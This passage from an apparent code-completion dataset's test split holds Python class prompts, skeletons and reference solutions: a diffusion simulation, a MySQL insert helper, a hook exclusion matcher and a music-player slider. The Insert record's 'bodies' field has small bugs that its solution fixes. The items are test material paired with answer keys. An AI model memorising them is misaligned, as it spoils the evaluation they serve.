cb.formatter = matplotlib.ticker.FormatStrFormatter('')\n plt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\n plt.pause(0.001)\n plt.draw()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000177", "length_bytes": 4737, "license_type": "permissive", "methods": [{"docstring": "Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.", "name": "initialize", "signature": "def initialize(self)"}, {"docstring": "The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.", "name": "method_compute_timestep", "signature": "def method_compute_timestep(self)"}, {"docstring": "Diffusion through dt using C-N implicit solve with multigrid", "name": "evolve", "signature": "def evolve(self)"}, {"docstring": "Do runtime visualization.", "name": "dovis", "signature": "def dovis(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_test_000367", "prompt": "Implement the Python class `Simulation` described below.\n\nClass description:\nA simulation of diffusion\n\nMethod signatures and docstrings:\n- def initialize(self): Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\n- def method_compute_timestep(self): The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\n- def evolve(self): Diffusion through dt using C-N implicit solve with multigrid\n- def dovis(self): Do runtime visualization.", "prompted_full_text": "Implement the Python class `Simulation` described below.\n\nClass description:\nA simulation of diffusion\n\nMethod signatures and docstrings:\n- def initialize(self): Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\n- def method_compute_timestep(self): The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\n- def evolve(self): Diffusion through dt using C-N implicit solve with multigrid\n- def dovis(self): Do runtime visualization.\n\n<|skeleton|>\nclass Simulation:\n \"\"\"A simulation of diffusion\"\"\"\n\n def initialize(self):\n \"\"\"Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\"\"\"\n <|body_0|>\n\n def method_compute_timestep(self):\n \"\"\"The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. 
Since we are doing an implicit discretization, we do not require CFL < 1.\"\"\"\n <|body_1|>\n\n def evolve(self):\n \"\"\"Diffusion through dt using C-N implicit solve with multigrid\"\"\"\n <|body_2|>\n\n def dovis(self):\n \"\"\"Do runtime visualization.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n my_grid = grid_setup(self.rp, ng=1)\n if my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion problems')\n n = int(math.log(my_grid.nx) / math.log(2.0))\n if 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\n bc, _, _ = bc_setup(self.rp)\n for bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\n my_data = patch.CellCenterData2d(my_grid)\n my_data.register_var('phi', bc)\n my_data.create()\n self.cc_data = my_data\n problem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\n problem.init_data(self.cc_data, self.rp)\n<|end_body_0|>\n\n<|body_start_1|>\n cfl = self.rp.get_param('driver.cfl')\n k = self.rp.get_param('diffusion.k')\n xtmp = self.cc_data.grid.dx ** 2 / k\n ytmp = self.cc_data.grid.dy ** 2 / k\n self.dt = cfl * min(xtmp, ytmp)\n<|end_body_1|>\n\n<|body_start_2|>\n self.cc_data.fill_BC_all()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n k = self.rp.get_param('diffusion.k')\n mg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\n f = mg.soln_grid.scratch_array()\n f.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\n mg.init_RHS(f)\n mg.init_zeros()\n mg.solve(rtol=1e-10)\n phi.v()[:, :] = mg.get_solution().v()\n self.cc_data.t += self.dt\n self.n += 1\n<|end_body_2|>\n\n<|body_start_3|>\n plt.clf()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n img = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('phi')\n cb = plt.colorbar(img)\n cb.formatter = matplotlib.ticker.FormatStrFormatter('')\n plt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\n plt.pause(0.001)\n plt.draw()\n<|end_body_3|>\n", "revision_id": "f91789a319caa98dfbc3f496e9953756e6ee3ca9", "skeleton": "<|skeleton|>\nclass Simulation:\n \"\"\"A simulation of diffusion\"\"\"\n\n def initialize(self):\n \"\"\"Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\"\"\"\n <|body_0|>\n\n def method_compute_timestep(self):\n \"\"\"The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. 
Since we are doing an implicit discretization, we do not require CFL < 1.\"\"\"\n <|body_1|>\n\n def evolve(self):\n \"\"\"Diffusion through dt using C-N implicit solve with multigrid\"\"\"\n <|body_2|>\n\n def dovis(self):\n \"\"\"Do runtime visualization.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Simulation:\n \"\"\"A simulation of diffusion\"\"\"\n\n def initialize(self):\n \"\"\"Initialize the grid and variables for diffusion and set the initial conditions for the chosen problem.\"\"\"\n my_grid = grid_setup(self.rp, ng=1)\n if my_grid.nx != my_grid.ny:\n msg.fail('need nx = ny for diffusion problems')\n n = int(math.log(my_grid.nx) / math.log(2.0))\n if 2 ** n != my_grid.nx:\n msg.fail('grid needs to be a power of 2')\n bc, _, _ = bc_setup(self.rp)\n for bnd in [bc.xlb, bc.xrb, bc.ylb, bc.yrb]:\n if bnd not in ['periodic', 'neumann', 'dirichlet']:\n msg.fail('invalid BC')\n my_data = patch.CellCenterData2d(my_grid)\n my_data.register_var('phi', bc)\n my_data.create()\n self.cc_data = my_data\n problem = importlib.import_module(f'pyro.diffusion.problems.{self.problem_name}')\n problem.init_data(self.cc_data, self.rp)\n\n def method_compute_timestep(self):\n \"\"\"The diffusion timestep() function computes the timestep using the explicit timestep constraint as the starting point. We then multiply by the CFL number to get the timestep. Since we are doing an implicit discretization, we do not require CFL < 1.\"\"\"\n cfl = self.rp.get_param('driver.cfl')\n k = self.rp.get_param('diffusion.k')\n xtmp = self.cc_data.grid.dx ** 2 / k\n ytmp = self.cc_data.grid.dy ** 2 / k\n self.dt = cfl * min(xtmp, ytmp)\n\n def evolve(self):\n \"\"\"Diffusion through dt using C-N implicit solve with multigrid\"\"\"\n self.cc_data.fill_BC_all()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n k = self.rp.get_param('diffusion.k')\n mg = MG.CellCenterMG2d(myg.nx, myg.ny, xmin=myg.xmin, xmax=myg.xmax, ymin=myg.ymin, ymax=myg.ymax, xl_BC_type=self.cc_data.BCs['phi'].xlb, xr_BC_type=self.cc_data.BCs['phi'].xrb, yl_BC_type=self.cc_data.BCs['phi'].ylb, yr_BC_type=self.cc_data.BCs['phi'].yrb, alpha=1.0, beta=0.5 * self.dt * k, verbose=0)\n f = mg.soln_grid.scratch_array()\n f.v()[:, :] = phi.v() + 0.5 * self.dt * k * ((phi.ip(1) + phi.ip(-1) - 2.0 * phi.v()) / myg.dx ** 2 + (phi.jp(1) + phi.jp(-1) - 2.0 * phi.v()) / myg.dy ** 2)\n mg.init_RHS(f)\n mg.init_zeros()\n mg.solve(rtol=1e-10)\n phi.v()[:, :] = mg.get_solution().v()\n self.cc_data.t += self.dt\n self.n += 1\n\n def dovis(self):\n \"\"\"Do runtime visualization.\"\"\"\n plt.clf()\n phi = self.cc_data.get_var('phi')\n myg = self.cc_data.grid\n img = plt.imshow(np.transpose(phi.v()), interpolation='nearest', origin='lower', extent=[myg.xmin, myg.xmax, myg.ymin, myg.ymax], cmap=self.cm)\n plt.xlabel('x')\n plt.ylabel('y')\n plt.title('phi')\n cb = plt.colorbar(img)\n cb.formatter = matplotlib.ticker.FormatStrFormatter('')\n plt.figtext(0.05, 0.0125, f't = {self.cc_data.t:10.5f}')\n plt.pause(0.001)\n plt.draw()\n", "source": "the_stack_v2_python_sparse", "source_path": "pyro/diffusion/simulation.py", "source_repo": "python-hydro/pyro2", "split": "test", "star_events_count": 202} {"blob_id": "312d98cc9a1d211b5c6bccf390a19ca0c3251c49", "bodies": ["existing_rows = self.select(table, columns)\nunique = diff(existing_rows, values, y_only=True)\nkeys = self.get_primary_key_vals(table)\npk_col = 
self.get_primary_key(table)\npk_index = columns.index(pk_col)\nto_insert, to_update = ([], [])\nfor index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\nif len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\nif len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\nif len(to_insert) < 1 and len(to_update) < 0:\n self._printer('No rows added to', table)", "cols, vals = get_col_val_str(columns)\nstatement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\nif execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\nelse:\n return statement", "if not isinstance(values[0], (list, set, tuple)):\n values = []\n for v in values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\ncols, vals = get_col_val_str(columns)\nstatement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\nif execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\nelif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\nelse:\n return statement"], "bodies_text": "<|body_start_0|>\n existing_rows = self.select(table, columns)\n unique = diff(existing_rows, values, y_only=True)\n keys = self.get_primary_key_vals(table)\n pk_col = self.get_primary_key(table)\n pk_index = columns.index(pk_col)\n to_insert, to_update = ([], [])\n for index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\n if len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\n if len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\n if len(to_insert) < 1 and len(to_update) < 0:\n self._printer('No rows added to', table)\n<|end_body_0|>\n\n<|body_start_1|>\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\n else:\n return statement\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(values[0], (list, set, tuple)):\n values = []\n for v in values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\n elif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\n else:\n return statement\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Insert", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Insert:\n\n def insert_uniques(self, table, columns, values):\n \"\"\"Insert multiple rows into a table that do not already exist. 
If the row's primary key already exists, the row's values will be updated. If the row's primary key does not exist, a new row will be inserted\"\"\"\n <|body_0|>\n\n def insert(self, table, columns, values, execute=True):\n \"\"\"Insert a single row into a table.\"\"\"\n <|body_1|>\n\n def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True):\n \"\"\"Insert multiple rows into a table. If only one row is found, self.insert method will be used.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n existing_rows = self.select(table, columns)\n unique = diff(existing_rows, values, y_only=True)\n keys = self.get_primary_key_vals(table)\n pk_col = self.get_primary_key(table)\n pk_index = columns.index(pk_col)\n to_insert, to_update = ([], [])\n for index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\n if len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\n if len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\n if len(to_insert) < 1 and len(to_update) < 1:\n self._printer('No rows added to', table)\n<|end_body_0|>\n\n<|body_start_1|>\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\n else:\n return statement\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(values[0], (list, set, tuple)):\n scalar_values = values\n values = []\n for v in scalar_values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\n elif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\n else:\n return statement\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000178", "length_bytes": 3676, "license_type": "permissive", "methods": [{"docstring": "Insert multiple rows into a table that do not already exist. If the row's primary key already exists, the row's values will be updated. If the row's primary key does not exist, a new row will be inserted", "name": "insert_uniques", "signature": "def insert_uniques(self, table, columns, values)"}, {"docstring": "Insert a single row into a table.", "name": "insert", "signature": "def insert(self, table, columns, values, execute=True)"}, {"docstring": "Insert multiple rows into a table. If only one row is found, self.insert method will be used.", "name": "insert_many", "signature": "def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_test_000345", "prompt": "Implement the Python class `Insert` described below.\n\nClass description:\nImplement the Insert class.\n\nMethod signatures and docstrings:\n- def insert_uniques(self, table, columns, values): Insert multiple rows into a table that do not already exist. If the row's primary key already exists, the row's values will be updated. 
If the row's primary key does not exist, a new row will be inserted\n- def insert(self, table, columns, values, execute=True): Insert a single row into a table.\n- def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True): Insert multiple rows into a table. If only one row is found, self.insert method will be used.", "prompted_full_text": "Implement the Python class `Insert` described below.\n\nClass description:\nImplement the Insert class.\n\nMethod signatures and docstrings:\n- def insert_uniques(self, table, columns, values): Insert multiple rows into a table that do not already exist. If the row's primary key already exists, the row's values will be updated. If the row's primary key does not exist, a new row will be inserted\n- def insert(self, table, columns, values, execute=True): Insert a single row into a table.\n- def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True): Insert multiple rows into a table. If only one row is found, self.insert method will be used.\n\n<|skeleton|>\nclass Insert:\n\n def insert_uniques(self, table, columns, values):\n \"\"\"Insert multiple rows into a table that do not already exist. If the row's primary key already exists, the row's values will be updated. If the row's primary key does not exist, a new row will be inserted\"\"\"\n <|body_0|>\n\n def insert(self, table, columns, values, execute=True):\n \"\"\"Insert a single row into a table.\"\"\"\n <|body_1|>\n\n def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True):\n \"\"\"Insert multiple rows into a table. If only one row is found, self.insert method will be used.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n existing_rows = self.select(table, columns)\n unique = diff(existing_rows, values, y_only=True)\n keys = self.get_primary_key_vals(table)\n pk_col = self.get_primary_key(table)\n pk_index = columns.index(pk_col)\n to_insert, to_update = ([], [])\n for index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\n if len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\n if len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\n if len(to_insert) < 1 and len(to_update) < 1:\n self._printer('No rows added to', table)\n<|end_body_0|>\n\n<|body_start_1|>\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\n else:\n return statement\n<|end_body_1|>\n\n<|body_start_2|>\n if not isinstance(values[0], (list, set, tuple)):\n scalar_values = values\n values = []\n for v in scalar_values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\n elif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\n else:\n return statement\n<|end_body_2|>\n", "revision_id": "6964f718f4b72eb30f2259adfcfaf3090526c53d", "skeleton": "<|skeleton|>\nclass 
Insert:\n\n def insert_uniques(self, table, columns, values):\n \"\"\"Insert multiple rows into a table that do not already exist. If the row's primary key already exists, the row's values will be updated. If the row's primary key does not exist, a new row will be inserted\"\"\"\n <|body_0|>\n\n def insert(self, table, columns, values, execute=True):\n \"\"\"Insert a single row into a table.\"\"\"\n <|body_1|>\n\n def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True):\n \"\"\"Insert multiple rows into a table. If only one row is found, self.insert method will be used.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Insert:\n def insert_uniques(self, table, columns, values):\n \"\"\"Insert multiple rows into a table that do not already exist. If the row's primary key already exists, the row's values will be updated. If the row's primary key does not exist, a new row will be inserted\"\"\"\n existing_rows = self.select(table, columns)\n unique = diff(existing_rows, values, y_only=True)\n keys = self.get_primary_key_vals(table)\n pk_col = self.get_primary_key(table)\n pk_index = columns.index(pk_col)\n to_insert, to_update = ([], [])\n for index, row in enumerate(unique):\n if row[pk_index] not in keys:\n to_insert.append(unique[index])\n elif row[pk_index] in keys:\n to_update.append(unique[index])\n if len(to_insert) > 0:\n self.insert_many(table, columns, to_insert)\n if len(to_update) > 0:\n self.update_many(table, columns, to_update, pk_col, 0)\n if len(to_insert) < 1 and len(to_update) < 1:\n self._printer('No rows added to', table)\n\n def insert(self, table, columns, values, execute=True):\n \"\"\"Insert a single row into a table.\"\"\"\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute:\n self._cursor.execute(statement, values)\n self._commit()\n self._printer('\\tMySQL row successfully inserted into {0}'.format(table))\n else:\n return statement\n\n def insert_many(self, table, columns, values, limit=MAX_ROWS_PER_QUERY, execute=True):\n \"\"\"Insert multiple rows into a table. 
If only one row is found, self.insert method will be used.\"\"\"\n if not isinstance(values[0], (list, set, tuple)):\n scalar_values = values\n values = []\n for v in scalar_values:\n if v is not None and len(v) > 0:\n values.append([v])\n else:\n values.append([None])\n cols, vals = get_col_val_str(columns)\n statement = 'INSERT INTO {0} ({1}) VALUES ({2})'.format(wrap(table), cols, vals)\n if execute and len(values) > limit:\n while len(values) > 0:\n vals = [values.pop(0) for i in range(0, min(limit, len(values)))]\n self._cursor.executemany(statement, vals)\n self._commit()\n elif execute:\n self._cursor.executemany(statement, values)\n self._commit()\n self._printer('\\tMySQL rows (' + str(len(values)) + ') successfully INSERTED')\n else:\n return statement\n", "source": "the_stack_v2_python_sparse", "source_path": "mysql/toolkit/components/manipulate/insert.py", "source_repo": "sfneal/mysql-toolkit", "split": "test", "star_events_count": 6} {"blob_id": "639c879674e4028b92c59d215b35f7bcf8022c21", "bodies": ["self._scope = []\nfor path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)", "for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\nreturn False"], "bodies_text": "<|body_start_0|>\n self._scope = []\n for path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)\n<|end_body_0|>\n\n<|body_start_1|>\n for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\n return False\n<|end_body_1|>\n", "class_docstring": "Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.", "class_name": "ExclusionScope", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExclusionScope:\n \"\"\"Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\"\"\"\n\n def __init__(self, scope):\n \"\"\"Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\"\"\"\n <|body_0|>\n\n def __contains__(self, proj_dir):\n \"\"\"Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._scope = []\n for path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)\n<|end_body_0|>\n\n<|body_start_1|>\n for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\n return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000179", "length_bytes": 37276, "license_type": "no_license", "methods": [{"docstring": "Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.", "name": "__init__", "signature": "def __init__(self, scope)"}, {"docstring": "Checks if |proj_dir| matches the excluded paths. 
Args: proj_dir: The relative path of the project.", "name": "__contains__", "signature": "def __contains__(self, proj_dir)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003060", "prompt": "Implement the Python class `ExclusionScope` described below.\n\nClass description:\nExclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\n\nMethod signatures and docstrings:\n- def __init__(self, scope): Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\n- def __contains__(self, proj_dir): Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.", "prompted_full_text": "Implement the Python class `ExclusionScope` described below.\n\nClass description:\nExclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\n\nMethod signatures and docstrings:\n- def __init__(self, scope): Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\n- def __contains__(self, proj_dir): Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\n\n<|skeleton|>\nclass ExclusionScope:\n \"\"\"Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\"\"\"\n\n def __init__(self, scope):\n \"\"\"Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\"\"\"\n <|body_0|>\n\n def __contains__(self, proj_dir):\n \"\"\"Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._scope = []\n for path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)\n<|end_body_0|>\n\n<|body_start_1|>\n for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\n return False\n<|end_body_1|>\n", "revision_id": "78a61ca023cbf1a0cecfef8b97df2b274ac3a988", "skeleton": "<|skeleton|>\nclass ExclusionScope:\n \"\"\"Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\"\"\"\n\n def __init__(self, scope):\n \"\"\"Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. Regular expressions must start with the ^ character.\"\"\"\n <|body_0|>\n\n def __contains__(self, proj_dir):\n \"\"\"Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExclusionScope:\n \"\"\"Exclusion scope for a hook. An exclusion scope can be used to determine if a hook has been disabled for a specific project.\"\"\"\n\n def __init__(self, scope):\n \"\"\"Initialize. Args: scope: A list of shell-style wildcards (fnmatch) or regular expression. 
Regular expressions must start with the ^ character.\"\"\"\n self._scope = []\n for path in scope:\n if path.startswith('^'):\n self._scope.append(re.compile(path))\n else:\n self._scope.append(path)\n\n def __contains__(self, proj_dir):\n \"\"\"Checks if |proj_dir| matches the excluded paths. Args: proj_dir: The relative path of the project.\"\"\"\n for exclusion_path in self._scope:\n if hasattr(exclusion_path, 'match'):\n if exclusion_path.match(proj_dir):\n return True\n elif fnmatch.fnmatch(proj_dir, exclusion_path):\n return True\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "tools/repohooks/rh/hooks.py", "source_repo": "ZYHGOD-1/Aosp11", "split": "test", "star_events_count": 0} {"blob_id": "ea17631ac4dd76bd8f9486f65c6a1478b87d973c", "bodies": ["self._pubsub = pubsub_bus\nself._player = player_\nbuilder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\nself.widget = builder.get_object('container')\nalignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\nself._position: Gtk.Label = builder.get_object('position')\nself._duration: Gtk.Label = builder.get_object('duration')\nself.slider: Gtk.Scale = builder.get_object('slider')\nself._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\nbuilder.connect_signals(self)", "alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\nalignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\nself.slider.set_range(0.0, status.duration.total_seconds())\nself.slider.set_value(status.position.total_seconds())", "del slider, scroll\nlower = self.slider.get_adjustment().get_lower()\nupper = self.slider.get_adjustment().get_upper()\nself._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\nreturn False"], "bodies_text": "<|body_start_0|>\n self._pubsub = pubsub_bus\n self._player = player_\n builder = Gtk.Builder.new_from_string(resources.read_text('pepper_music_player.ui', 'player_status_position_slider.glade'), length=-1)\n self.widget = builder.get_object('container')\n alignment.set_direction_recursive(self.widget, Gtk.TextDirection.LTR)\n self._position: Gtk.Label = builder.get_object('position')\n self._duration: Gtk.Label = builder.get_object('duration')\n self.slider: Gtk.Scale = builder.get_object('slider')\n self._pubsub.subscribe(player.PlayStatus, self._handle_play_status, want_last_message=True)\n builder.connect_signals(self)\n<|end_body_0|>\n\n<|body_start_1|>\n alignment.fill_aligned_numerical_label(self._position, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.position))\n alignment.fill_aligned_numerical_label(self._duration, formatting.format_timedelta(None if status.state is player.State.STOPPED else status.duration))\n self.slider.set_range(0.0, status.duration.total_seconds())\n self.slider.set_value(status.position.total_seconds())\n<|end_body_1|>\n\n<|body_start_2|>\n del slider, scroll\n lower = self.slider.get_adjustment().get_lower()\n upper = self.slider.get_adjustment().get_upper()\n self._player.seek(datetime.timedelta(seconds=min(max(value, lower), upper)))\n return False\n<|end_body_2|>\n", "class_docstring": "Position slider, including labels for the current position and duration. 
